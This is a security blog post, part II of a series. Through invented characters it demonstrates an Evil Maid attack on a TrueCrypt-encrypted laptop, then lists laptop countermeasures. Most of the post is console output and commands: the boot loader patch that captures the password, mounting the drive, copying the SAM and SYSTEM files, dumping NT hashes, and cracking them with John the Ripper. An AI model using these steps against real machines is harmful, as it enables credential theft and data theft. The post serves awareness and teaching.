Justin Case steals SAM – Part II

TrueCryptIn part I of this story I wrote on how someone with physical access to a system could easily steal all kinds of sensitive data like passwords, plans for corporate takeover, trade secrets, tax information or family photos which the owners would not want to be disclosed. This would be accomplished  in a stealthy manner. This could also happen if a laptop is lost or stolen of course in this way the owner would notice and could respond to the incident .

Nonetheless, one way to address this problem is to encrypt the hard drive. In this case even if the laptop is stolen, lost or rebooted using a USB stick to bypass security the files will be unreadable. However, while this is a valuable countermeasure against lost or theft of data it will not defend against sophisticated and motivated attackers.  Back in 2009, Joanna Rutkowska – a brilliant security researcher – implemented the Evil Maid attack against a system with full disk encryption using TrueCrypt.

The concept is similar as in the previous article:

  1. Justin Case prepares a bootable USB stick with evilmaidusb-1.01.img image.
  2. Justin Case sneaks into Ivan Idea room and boot the laptop with the bootable USB stick.
  3. After 1 or 2 minutes the laptop would check if the system is running TrueCrypt Boot Loader is running [v 6.0a and 6.2a].
  4. Using the command prompt Justin Case can infect the Boot Loader with an infected version.
  5. The computers is turned off and he leaves the room
  6. Ivan Idea gets back to his is room and inserts his password during the boot process to work a little bit and then leaves the room again.
  7. Justin Case goes back into  the room. It boots the laptop again with the USB stick and the password is revealed. Now he has the key to decrypt the hard drive, he can steal data.
  8. Now with the password,  Justin Case boots the system with Backtrack and mounts the encrypted volume with TrueCrypt utility and then dumps the hashes and cracks the passwords.

Lets look into each one of these steps.

The following illustrate the bootable USB stick and the usage of the TrueCrypt Evil Maid Patch v0.1

SYSLINUX 3.75 2009-04-16 EBIOS Copyright (C) 1994-2009 
Booting the kernel. it will take up to a minute...
Mounting proc filesystem
Mouting sysfs filesystem
Creating /dev
Creating initial device nodes
Setting up hotplug
Loadling /lib/kbd/keymaps/i386/querty/us.map
Creating block device nodes.
Creating character device nodes.
Making device-mapper control node
Waiting for the USB stick to initi...
Waiting for the USB stick to initi...
Waiting for the USB stick to initi...
sd 4:0:0:0: [sdb] Assuming drive cache: write trough
sd 4:0:0:0: [sdb] Assuming drive cache: write trough
sd 4:0:0:0: [sdb] Attached SCSI removable disk
Mount command: mount -r -t vfat /dev/sdb1 mnt/stick
TARGET = /dev/sda
What do you want to do today: Run [E]vil Mail, [S]hell, [R]eboot
E
remouting /mnt/stick rw...
TrueCrypt EvilMaid patcher v0.1
--------------------------------
TrueCrypt Boot Loader detected
PatchTrueCrypt(): Compressed loader size: 11641 bytes
PatchTrueCrypt(): Loader memory size: 0x6C00 (27648) bytes
PatchTrueCrypt(): Decompressing the boot loader
PatchTrueCrypt(): Decompression successful
PatchTrueCrypt(): Decompressed loader physical size: 18790 bytes
PatchAskPassword(): AskPassword() located at offset 0x1B24
PatchTrueCrypt(): Compressing the patched loader
PatchTrueCrypt(): Compression successful
PatchTrueCrypt(): Compressed patched loader size: 11753 bytes
PatchTrueCrypt(): New checksum: 0xD88FD56F
saving original sectors in /mnt/stick/sectors-2013-10-15-221453
remouting /mnt/stick in ro...
done; you can reboot safely.
What do you want to do today: Run [E]vil Mail, [S]hell, [R]eboot
R

After this the TrueCrypt Boot Loader is infected and will capture the password next time the password is introduced. Then one could boot the system again with the USB stick to reveal the password:

SYSLINUX 3.75 2009-04-16 EBIOS Copyright (C) 1994-2009 
Booting the kernel. it will take up to a minute...
Mounting proc filesystem
Mouting sysfs filesystem
Creating /dev
Creating initial device nodes
Setting up hotplug
Loadling /lib/kbd/keymaps/i386/querty/us.map
Creating block device nodes.
Creating character device nodes.
Making device-mapper control node
Waiting for the USB stick to initi...
Waiting for the USB stick to initi...
Waiting for the USB stick to initi...
sd 4:0:0:0: [sdb] Assuming drive cache: write trough
sd 4:0:0:0: [sdb] Assuming drive cache: write trough
sd 4:0:0:0: [sdb] Attached SCSI removable disk
Mount command: mount -r -t vfat /dev/sdb1 mnt/stick
TARGET = /dev/sda
What do you want to do today: Run [E]vil Mail, [S]hell, [R]eboot
E
remouting /mnt/stick rw...
TrueCrypt EvilMaid patcher v0.1
--------------------------------
TrueCrypt Boot Loader detected
PatchTrueCrypt(): Compressed loader size: 11753 bytes
PatchTrueCrypt(): Loader memory size: 0x6C00 (28672) bytes
PatchTrueCrypt(): Decompressing the boot loader
PatchTrueCrypt(): Decompression successful
PatchTrueCrypt(): Decompressed loader physical size: 27687 bytes
PatchAskPassword(): Loader is already infected
PatchTrueCrypt(): PatchAskPassword() failed
DisplayTrueCryptPassword(): Password is "encrypt"
saving original sectors in /mnt/stick/sectors-2013-10-15-221802
remouting /mnt/stick in ro...
done; you can reboot safely.
What do you want to do today: Run [E]vil Mail, [S]hell, [R]eboot

Now that Justin Case has the password he can boot a Linux Live CD like Backtrack, install TrueCrypt and then mount the TrueCrypt volume to steal the SAM database and SYSTEM registry file which contains the SYSKEY:

root@root:~# tar -xzvf truecrypt-7.1a-linux-x86.tar.gz
root@root:~# ./truecrypt-7.1a-setup-x86

root@root:~# fdisk -l
Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x0000cbec
Device Boot Start End Blocks Id System
/dev/sda1 * 1 13 102400 7 HPFS/NTFS
Partition 1 does not end on cylinder boundary.
/dev/sda2 13 18995 152473600 7 HPFS/NTFS

root@root:~# truecrypt --text --mount-options=system /dev/sda2 /mnt/ 
Enter password for /dev/sda2: 
Enter keyfile [none]: none
Protect hidden volume (if any)? (y=Yes/n=No) [No]: N

root@root:~# truecrypt --text -l -v 
Slot: 1
Volume: /dev/sda2
Virtual Device: /dev/mapper/truecrypt1
Mount Directory: /mnt
Size: 145 GB
Type: Normal
Read-Only: No
Hidden Volume Protected: No
Encryption Algorithm: AES
Primary Key Size: 256 bits
Secondary Key Size (XTS Mode): 256 bits
Block Size: 128 bits
Mode of Operation: XTS
PKCS-5 PRF: HMAC-RIPEMD-160
Volume Format Version: 1
Embedded Backup Header: No

root@root:~# ls /mnt/
autoexec.bat Documents and Settings pagefile.sys ProgramData Recovery System Volume Information Windows
config.sys hiberfil.sys PerfLogs Program Files $Recycle.Bin Users

root@root:~# cp /mnt/Windows/System32/config/SAM /media/USB
root@root:~# cp /mnt/Windows/System32/config/SYSTEM /media/USB

With the SAM database and SYSKEY we could use the attack mention on the previous article. Another way, eventually one could go further and dump the NT hashes. Because there is direct access to the SAM database and SYSTEM registry file we could run the bkhive tool for linux which recovers the Syskey bootkey from system hive file and then samdump2 for linux who dumps Windows password hashes. Both tools were originally made by Nicola Cuomo. Finally, we use  John the Ripper to crack the passwords using a dictionary attack.

root@root:~# bkhive /mnt/Windows/System32/config/SYSTEM syskey-output

bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it
Root Key : CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
Default ControlSet: 001
Bootkey: 3ea5580bee2fa204f9b5110e47d200f7

root@root:~# samdump2 /mnt/Windows/System32/config/SAM syskey-output > ACME-NT-Hashes
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it
Root Key : CMI-CreateHive{899121E8-11D8-44B6-ACEB-301713D5ED8C}

root@root:~# cat ACME-NT-Hashes 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dd21163c6ab4dff1517f0ba7464a511d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Ivan.Idea:1000:aad3b435b51404eeaad3b435b51404ee:c0d303c74587269c9557c706365ba8f0:::
Dee.Plomassy:1001:aad3b435b51404eeaad3b435b51404ee:250cfeaa42d97f8ea0d30400e8016d29:::
Herman.Nootix:1002:aad3b435b51404eeaad3b435b51404ee:09238831b1af5edab93c773f56409d96:::
Polly.Tix:1003:aad3b435b51404eeaad3b435b51404ee:1f255ea9557f52407f4290c904447f1a:::

root@root:/pentest/passwords/john# ./john ~/ACME-NT-Hashes --format=NT --wordlist=big-dictionary.lst
Loaded 6 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
bigideas (Ivan.Idea)
StR0ngP4ss (Dee.Plomassy)
LovePolitics (Polly.Tix)
P4$$w0rd (Herman.Nootix)

root@root:~# truecrypt --text -d /mnt/
root@root:~# shutdown -d now

When using a laptop or other mobile device regardless of being used inside the organization or outside for business use, protection mechanisms and strategies should be enforced in order to maintain its confidentiality, integrity and availability.  “No laptop should contain sensitive information on the hard drive or the hard drive should be removed and carried separately from the machine. It is estimated that on in four laptops will be stolen, so this is a very real threat. Let the machine go but make sure there is no company information going with it” [1]. However this might not be practical to your environment or business requirements one could consider – apart of the already mentioned and among others – the following countermeasures for Laptops [2]:

  • Use a cable lock during travel. They deter the casual theft. Lock it whenever you have to leave it unattended.
  • Do not leave your laptop unattended.
  • Use strong passwords. The stronger the password the less likely it will be for someone guess it or crack it.
  • Encrypt your data. Could be expensive but it should be considered if the value of the corporate or personal data information outweighs the costs of encrypting it.
  • Lo-Jack for Laptops. It will help to recover your laptop in case of theft. After being stolen or lost, if the laptop is connected to the internet, the tracking software will locate the laptop and notify law enforcement.

References:
[1] M. Desman. Building an Information Security Awareness Program (Auerbach Publications, 2001)
[2] Official (ISC)2 Guide to ISSAP CBK (Auerbach Publications, 2011)

Further Reading:
Evil Maid” Attacks on Encrypted Hard Drives
Evil Maid goes after TrueCrypt!
Lest We Remember: Cold Boot Attacks on Encryption Keys
Research on cold boot attacks from Princeton University
Attacking the BitLocker Boot Process∗
Quickpost: Disassociating the Key From a TrueCrypt System Disk
SYSKEY

Advertisements
Tagged , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

gb_master's /dev/null

... and I said, "Hello, Satan. I believe it's time to go."

Source Code Auditing, Reversing, Web Security

Finding Hidden codes in the software

BruteForce Lab

security, programming, devops, visualization, the cloud

Count Upon Security

Increase security awareness. Promote, reinforce and learn security skills.

Naked Security

Computer Security News, Advice and Research

Didier Stevens

(blog \'DidierStevens)

malwology

Adventures in double-clicking malware / by Anuj Soni

Rational Survivability

Hoff's Ramblings about Information Survivability, Information Centricity, Risk Management and Disruptive Innovation.

SANS Internet Storm Center, InfoCON: green

Increase security awareness. Promote, reinforce and learn security skills.

TaoSecurity

Increase security awareness. Promote, reinforce and learn security skills.

Schneier on Security

Increase security awareness. Promote, reinforce and learn security skills.

Technicalinfo.net Blog

Increase security awareness. Promote, reinforce and learn security skills.

Lenny Zeltser

Increase security awareness. Promote, reinforce and learn security skills.

Krebs on Security

In-depth security news and investigation

%d bloggers like this: